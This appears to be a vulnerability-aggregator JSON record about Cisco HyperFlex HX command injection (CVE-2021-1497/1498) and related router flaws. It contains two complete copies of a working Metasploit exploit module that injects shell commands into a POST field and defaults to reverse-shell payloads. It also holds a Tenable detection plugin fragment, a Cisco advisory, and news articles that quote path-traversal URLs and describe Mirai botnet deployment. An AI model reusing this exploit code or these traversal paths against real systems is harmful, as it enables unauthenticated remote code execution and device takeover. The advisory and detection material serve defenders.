script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"buffalo_www_detect.nbin\");\n script_require_keys(\"installed_sw/Buffalo WWW\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar port = get_http_port(default:80, embedded:TRUE);\nvar app_info = vcf::get_app_info(app:'Buffalo WWW', webapp:TRUE, port:port);\nvar constraints;\n\nif('WSR-2533DHPL2' >< app_info.model || 'WXR-5700AX7S' >< app_info.model || 'WSR-1166DHP2' >< app_info.model )\n constraints = [{'min_version' : '0', 'fixed_display' : 'No known fix' }];\nelse if('WSR-A2533DHP3' >< app_info.model) \n constraints = [{'min_version' : '0', 'fixed_version' : '1.25' }];\nelse if('WSR-3200AX4S' >< app_info.model)\n constraints = [{'min_version' : '0', 'fixed_version' : '1.20' }];\nelse\n{\n var ver_model = app_info.version;\n if (!empty_or_null(app_info.model))\n ver_model = ver_model + ' (model '+app_info.model+')';\n audit(AUDIT_INST_VER_NOT_VULN, app_info.app, ver_model);\n}\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2021-06-04T16:21:33", "description": "", "cvss3": {}, "published": "2021-06-04T00:00:00", "type": "packetstorm", "title": "Cisco HyperFlex HX Data Platform Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "modified": "2021-06-04T00:00:00", "id": "PACKETSTORM:162976", "href": "https://packetstormsecurity.com/files/162976/Cisco-HyperFlex-HX-Data-Platform-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Cisco HyperFlex HX Data Platform Command Execution', \n'Description' => %q{ \nThis module exploits an unauthenticated command injection in Cisco \nHyperFlex HX Data Platform's /storfs-asup endpoint to execute shell \ncommands as the Tomcat user. \n}, \n'Author' => [ \n'Nikita Abramov', # Discovery \n'Mikhail Klyuchnikov', # Discovery \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2021-1497'], # HyperFlex HX Data Platform Installer \n['CVE', '2021-1498'], # HyperFlex HX Data Platform \n['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR'], \n['URL', 'https://attackerkb.com/assessments/4f532147-b27b-4079-aed1-5cfdc402cf5c'], \n['URL', 'https://twitter.com/ptswarm/status/1390300625129201664'] \n], \n'DisclosureDate' => '2021-05-05', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, # Privesc left as an exercise for the reader \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_python_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \n \nregister_advanced_options([ \nOptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5]) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => %w[GET POST].sample, \n'uri' => normalize_uri(target_uri.path, 'storfs-asup') \n) \n \nreturn CheckCode::Unknown unless res \n \nunless res.code == 200 && \nres.body.include?('Action for the servlet need be specified.') \nreturn CheckCode::Safe \nend \n \nCheckCode::Vulnerable('Storfs ASUP servlet detected.') \nend \n \ndef exploit \nprint_status(\"Selected #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nprint_status(\"Executing command: #{cmd}\") \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'storfs-asup'), \n'vars_post' => { \n'action' => Faker::Hacker.verb, \n%w[token mode].sample => \"$(#{cmd})\" \n} \n}, datastore['CmdExecTimeout']) \n \nunless res \nprint_warning('Command execution timed out') \nreturn \nend \n \nunless res.code == 200 \nfail_with(Failure::PayloadFailed, 'Failed to execute command') \nend \n \nprint_good('Successfully executed command') \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/162976/cisco_hyperflex_hx_data_platform_cmd_exec.rb.txt"}], "zdt": [{"lastseen": "2023-05-27T14:46:33", "description": "This Metasploit module exploits an unauthenticated command injection in Cisco HyperFlex HX Data Platform's /storfs-asup endpoint to execute shell commands as the Tomcat user.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-04T00:00:00", "type": "zdt", "title": "Cisco HyperFlex HX Data Platform Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "modified": "2021-06-04T00:00:00", "id": "1337DAY-ID-36357", "href": "https://0day.today/exploit/description/36357", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Cisco HyperFlex HX Data Platform Command Execution',\n 'Description' => %q{\n This module exploits an unauthenticated command injection in Cisco\n HyperFlex HX Data Platform's /storfs-asup endpoint to execute shell\n commands as the Tomcat user.\n },\n 'Author' => [\n 'Nikita Abramov', # Discovery\n 'Mikhail Klyuchnikov', # Discovery\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-1497'], # HyperFlex HX Data Platform Installer\n ['CVE', '2021-1498'], # HyperFlex HX Data Platform\n ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR'],\n ['URL', 'https://attackerkb.com/assessments/4f532147-b27b-4079-aed1-5cfdc402cf5c'],\n ['URL', 'https://twitter.com/ptswarm/status/1390300625129201664']\n ],\n 'DisclosureDate' => '2021-05-05',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false, # Privesc left as an exercise for the reader\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n\n register_advanced_options([\n OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => %w[GET POST].sample,\n 'uri' => normalize_uri(target_uri.path, 'storfs-asup')\n )\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 &&\n res.body.include?('Action for the servlet need be specified.')\n return CheckCode::Safe\n end\n\n CheckCode::Vulnerable('Storfs ASUP servlet detected.')\n end\n\n def exploit\n print_status(\"Selected #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n print_status(\"Executing command: #{cmd}\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'storfs-asup'),\n 'vars_post' => {\n 'action' => Faker::Hacker.verb,\n %w[token mode].sample => \"$(#{cmd})\"\n }\n }, datastore['CmdExecTimeout'])\n\n unless res\n print_warning('Command execution timed out')\n return\n end\n\n unless res.code == 200\n fail_with(Failure::PayloadFailed, 'Failed to execute command')\n end\n\n print_good('Successfully executed command')\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36357", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisco": [{"lastseen": "2023-05-27T14:36:06", "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.\n\nFor more information about these vulnerabilities, see the Details [\"#details\"] section of this advisory.\n\nCisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR\"]", "cvss3": {}, "published": "2021-05-05T16:00:00", "type": "cisco", "title": "Cisco HyperFlex HX Command Injection Vulnerabilities", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "modified": "2022-12-15T22:19:48", "id": "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR", "cvss": {"score": 9.8, "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}], "thn": [{"lastseen": "2022-05-09T12:39:15", "description": "[](<https://thehackernews.com/images/-OyZSMpBc91Y/YRI88ocfD1I/AAAAAAAADfA/3z5jFwd1jb86NrMApn9qnJvhJh69BR5qwCLcBGAsYHQ/s0/router-hacking-exploit.jpg>)\n\nUnidentified threat actors are actively exploiting a critical authentication bypass vulnerability to hijack home routers as part of an effort to co-opt them to a Mirai-variant botnet used for carrying out DDoS attacks, merely two days after its public disclosure.\n\nTracked as [CVE-2021-20090](<https://nvd.nist.gov/vuln/detail/CVE-2021-20090>) (CVSS score: 9.9), the [weakness](<https://www.kb.cert.org/vuls/id/914124>) concerns a [path traversal vulnerability](<https://www.tenable.com/security/research/tra-2021-13>) in the web interfaces of [routers with Arcadyan firmware](<https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>) that could allow unauthenticated remote attackers to bypass authentication.\n\nDisclosed by Tenable on August 3, the issue is believed to have existed for at least 10 years, affecting at least 20 models across 17 different vendors, including Asus, Beeline, British Telecom, Buffalo, Deutsche Telekom, Orange, Telstra, Telus, Verizon, and Vodafone.\n\nSuccessful exploitation of the vulnerability could enable an attacker to circumvent authentication barriers and potentially gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n[](<https://thehackernews.com/images/-VpbYTZFqKSM/YRJGcZG2KXI/AAAAAAAADfI/G8Fi_k66FRwXnFO9vKQUXyFTF5Cy0lfJwCLcBGAsYHQ/s0/router.jpg>)\n\nJuniper Threat Labs last week [said](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>) it \"identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China\" starting on August 5, with the attacker leveraging it to deploy a Mirai variant on the affected routers, mirroring similar techniques [revealed](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>) by Palo Alto Networks' Unit 42 earlier this March.\n\n\"The similarity could indicate that the same threat actor is behind this new attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability,\" the researchers said.\n\nBesides CVE-2021\u201320090, the threat actor is also said to have carried out attacks leveraging a number of other vulnerabilities, such as -\n\n * [CVE-2020-29557](<https://nvd.nist.gov/vuln/detail/CVE-2020-29557>) (Pre-authentication remote code execution in D-Link DIR-825 R1 devices)\n * [CVE-2021-1497](<https://nvd.nist.gov/vuln/detail/CVE-2021-1497>) and [CVE-2021-1498](<https://nvd.nist.gov/vuln/detail/CVE-2021-1498>) (Command injection vulnerabilities in [Cisco HyperFlex HX](<https://thehackernews.com/2021/05/critical-flaws-hit-cisco-sd-wan-vmanage.html>))\n * [CVE-2021-31755](<https://nvd.nist.gov/vuln/detail/CVE-2021-31755>) (Stack buffer overflow vulnerability in Tenda AC11 leading to arbitrary code execution)\n * [CVE-2021-22502](<https://nvd.nist.gov/vuln/detail/CVE-2021-22502>) (Remote code execution flaw in Micro Focus Operation Bridge Reporter)\n * [CVE-2021-22506](<https://nvd.nist.gov/vuln/detail/CVE-2021-22506>) (Information Leakage vulnerability in Micro Focus Access Manager)\n\nUnit 42's report had previously uncovered as many as six known and three unknown security flaws that were exploited in the attacks, counting those targeted at SonicWall SSL-VPNs, D-Link DNS-320 firewalls, Netis WF2419 wireless routers, and Netgear ProSAFE Plus switches.\n\nTo avoid any potential compromise, users are recommended to update their router firmware to the latest version.\n\n\"It is clear that threat actors keep an eye on all disclosed vulnerabilities. Whenever an exploit PoC is published, it often takes them very little time to integrate it into their platform and launch attacks,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T09:27:00", "type": "thn", "title": "Hackers Exploiting New Auth Bypass Bug Affecting Millions of Arcadyan Routers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29557", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090", "CVE-2021-22502", "CVE-2021-22506", "CVE-2021-31755"], "modified": "2021-08-11T03:38:35", "id": "THN:EE1B4CCBFEA2E4D18964A709469ABD37", "href": "https://thehackernews.com/2021/08/hackers-exploiting-new-auth-bypass-bug.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:15", "description": "[](<https://thehackernews.com/images/-50vFnI5p98k/YJPgYtKAl9I/AAAAAAAACd8/1v7GG_-Ci1Ue9y2cRLkwDJeb39bmkPtYwCLcBGAsYHQ/s0/cisco.jpg>)\n\nNetworking equipment major Cisco has rolled out software updates to address multiple critical vulnerabilities impacting HyperFlex HX and SD-WAN vManage Software that could allow an attacker to perform command injection attacks, execute arbitrary code, and gain access to sensitive information.\n\nIn a series of advisories published on May 5, the company said there are no workarounds that remediate the issues.\n\nThe HyperFlex HX command injection vulnerabilities, tracked as CVE-2021-1497 and CVE-2021-1498 (CVSS scores 9.8), affect all Cisco devices running HyperFlex HX software versions 4.0, 4.5, and those prior to 4.0. Arising due to insufficient validation of user-supplied input in the web-based management interface of Cisco HyperFlex HX Data Platform, the flaws could enable an unauthenticated, remote attacker to perform a command injection attack against a vulnerable device.\n\n\"An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface,\" the company [said](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR>) in its alert. \"A successful exploit could allow the attacker to execute arbitrary commands\" either as a root or tomcat8 user.\n\nCisco also squashed [five glitches](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ>) affecting SD-WAN vManage Software (CVE-2021-1275, CVE-2021-1468, CVE-2021-1505, CVE-2021-1506, and CVE-2021-1508) that could permit an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain unauthorized access to the application.\n\nNikita Abramov and Mikhail Klyuchnikov of Positive Technologies have been credited with reporting the HyperFlex HX flaws, whereas four of the SD-WAN vManage bugs were identified during internal security testing, with CVE-2021-1275 uncovered during the resolution of a Cisco Technical Assistance Center (TAC) support case.\n\nWhile there is no evidence of malicious use of the vulnerabilities in the wild, it's recommended that users upgrade to the latest version to mitigate the risk associated with the flaws.\n\n### VMware Fixes Critical vRealize Business for Cloud Bug\n\nIt's not just Cisco. VMware on Wednesday released patches to fix a [critical severity flaw](<https://www.vmware.com/security/advisories/VMSA-2021-0007.html>) in vRealize Business for Cloud 7.6 that enables unauthenticated attackers to execute malicious code on vulnerable servers remotely.\n\nThe remote code execution flaw (CVE-2021-21984, CVSS score: 9.8) stems from an unauthorized [VAMI endpoint](<https://docs.vmware.com/en/VMware-Adapter-for-SAP-Landscape-Management/2.0.1/Installation-and-Administration-Guide-for-VLA-Administrators/GUID-CEEB151C-8B44-47B3-8D16-CB97BB865B2F.html>), resulting in a scenario that could cause an adversary with network access to run unauthorized code on the appliance. Affected customers can rectify the issue by [installing](<https://kb.vmware.com/s/article/83475>) the security patch ISO file.\n\nVmware credited Egor Dimitrenko of Positive Technologies for reporting the vulnerability.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T12:30:00", "type": "thn", "title": "Critical Flaws Hit Cisco SD-WAN vManage and HyperFlex Software", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1275", "CVE-2021-1468", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1505", "CVE-2021-1506", "CVE-2021-1508", "CVE-2021-21984"], "modified": "2021-05-07T01:50:39", "id": "THN:E5C91FC48CC9CB51116164A4422D17F8", "href": "https://thehackernews.com/2021/05/critical-flaws-hit-cisco-sd-wan-vmanage.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-08-09T19:54:43", "description": "An authentication-bypass vulnerability affecting multiple routers and internet-of-things (IoT) devices is being actively exploited in the wild, according to researchers.\n\nThe security flaw, tracked as CVE-2021-20090, was disclosed last week by researchers at Tenable. It affects devices from 20 different vendors and ISPs (ADB, Arcadyan, ASMAX, ASUS, Beeline, British Telecom, Buffalo, Deutsche Telekom, HughesNet, KPN, O2, Orange, Skinny, SparkNZ, Telecom [Argentina], TelMex, Telstra, Telus, Verizon and Vodafone), all of which use the same firmware from Arcadyan. In all, millions of devices worldwide could be vulnerable.\n\nTenable [demonstrated](<https://www.tenable.com/security/research/tra-2021-13>) in a proof of concept (PoC) that it\u2019s possible to modify a device\u2019s configuration to enable Telnet on a vulnerable router and gain root level shell access to the device.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe vulnerability exists due to a list of folders which fall under a \u2018bypass list\u2019 for authentication,\u201d according to Tenable\u2019s advisory on August 3. \u201cFor most of the devices listed, that means that the vulnerability can be triggered by multiple paths. For a device in which http://&lt;ip&gt;/index.htm requires authentication, an attacker could access index.htm using the following paths:\n\n * http://&lt;ip&gt;/images/..%2findex.htm\n * http://&lt;ip&gt;/js/..%2findex.htm\n * http://&lt;ip&gt;/css/..%2findex.htm\n\n\u201cTo have the pages load properly, one will need to use proxy match/replace settings to ensure any resources loaded which require authentication also leverage the path traversal,\u201d the advisory continued.\n\n## **Exploited to Spread Mirai Variant**\n\nJust three days after disclosure, on Friday, cybersecurity researchers from Juniper Networks said they had discovered active exploitation of the bug.\n\n\u201cWe have identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China,\u201d they wrote [in a post](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>). \u201cThe attacker seems to be attempting to deploy a [Mirai variant](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) on the affected routers.\u201d\n\nCleaving close to Tenable\u2019s PoC, the attackers are modifying the configuration of the attacked device to enable Telnet using \u201cARC_SYS_TelnetdEnable=1\u201d to take control, according to Juniper. Then, they proceed to download the Mirai variant from a command-and-control (C2) server and execute it.\n\nMirai is a long-running botnet that infects connected devices and can be used to mount distributed denial-of-service (DDoS) attacks. It [burst on the scene](<https://threatpost.com/mirai-masterminds-helping-fbi-snuff-out-cybercrime/137556/>) in 2016, when it overwhelmed servers at the Dyn web hosting company, taking down more than 1,200 websites, including Netflix and Twitter. Its source code [was leaked](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>) later that year, after which multiple Mirai variants began to crop up, in a barrage that continues to this day.\n\nSome of the scripts in the current set of attacks bear resemblance to previously observed activity picked up in February and March, according to Juniper.\n\n\u201cThe similarity could indicate that the same threat actor is behind this new attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability,\u201d researchers wrote. \u201cGiven that most people may not even be aware of the security risk and won\u2019t be upgrading their device anytime soon, this attack tactic can be very successful, cheap and easy to carry out.\u201d\n\nIn addition to the router bug, Juniper researchers observed the following known vulnerabilities being exploited to gain initial access to target devices:\n\n * CVE-2020-29557 (DLink routers)\n * CVE-2021-1497 and CVE-2021-1498 (Cisco HyperFlex)\n * CVE-2021-31755 (Tenda AC11)\n * CVE-2021-22502 (MicroFocus OBR)\n * CVE-2021-22506 (MicroFocus AM)\n\nIn fact, the attackers have been continuously adding new exploits to its arsenal, according to the posting, and CVE-2021-20090 is unlikely to be the last.\n\n\u201cIt is clear that threat actors keep an eye on all disclosed vulnerabilities,\u201d researchers concluded. \u201cWhenever an exploit PoC is published, it often takes them very little time to integrate it into their platform and launch attacks.\u201d\n\nTo avoid compromise, users should update their firmware on the router.\n\n\u201cIn the case of IoT devices or home gateways, the situation is much worse as most users are not tech-savvy and even those who are do not get informed about potential vulnerabilities and patches to apply,\u201d according to Juniper. \u201cThe only sure way to remedy this issue is to require vendors to offer zero-down-time automatic updates.\u201d\n\n**Worried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-09T19:41:30", "type": "threatpost", "title": "Auth Bypass Bug Exploited, Millions of Routers Affected", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29557", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090", "CVE-2021-22502", "CVE-2021-22506", "CVE-2021-31755"], "modified": "2021-08-09T19:41:30", "id": "THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E", "href": "https://threatpost.com/auth-bypass-bug-routers-exploited/168491/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-07T18:46:24", "description": "Cisco has addressed two critical security vulnerabilities in the SD-WAN vManage Software, one of which could allow an unauthenticated attacker to carry out remote code execution (RCE) on corporate networks or steal information.\n\nThe networking giant also disclosed a denial-of-service issue in vManage; and locally exploitable bugs that would allow an authenticated attacker to escalate privileges or gain unauthorized access to applications.\n\nSeparately, Cisco patched two vulnerabilities in the Cisco HyperFlex HX platform, one of them rated critical.\n\n## **Critical vManage Security Bugs**\n\nvManage is a centralized network management system that provides a GUI interface to easily monitor, configure and maintain all devices and links in the overlay SD-WAN. According to Cisco\u2019s [Wednesday advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ>), there are five security holes in the software, the first four only exploitable if the platform is running in cluster mode:\n\n * CVE-2021-1468: Critical Unauthorized Message-Processing Vulnerability (RCE)\n * CVE-2021-1505: Critical Privilege-Escalation Vulnerability\n * CVE-2021-1508: High-Severity Unauthorized-Access Vulnerability\n * CVE-2021-1506: High-Severity Unauthorized Services-Access Vulnerability\n * CVE-2021-1275: High-Severity Denial-of-Service Vulnerability\n\nThe issue tracked as CVE-2021-1468 is the most severe of the five, carrying a CVSS vulnerability-severity score of 9.8 out of 10. It exists in messaging service used by vManage, and is due to improper authentication checks on user-supplied input to an application messaging service, according to Cisco.\n\n[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS &amp; Cryptojacking 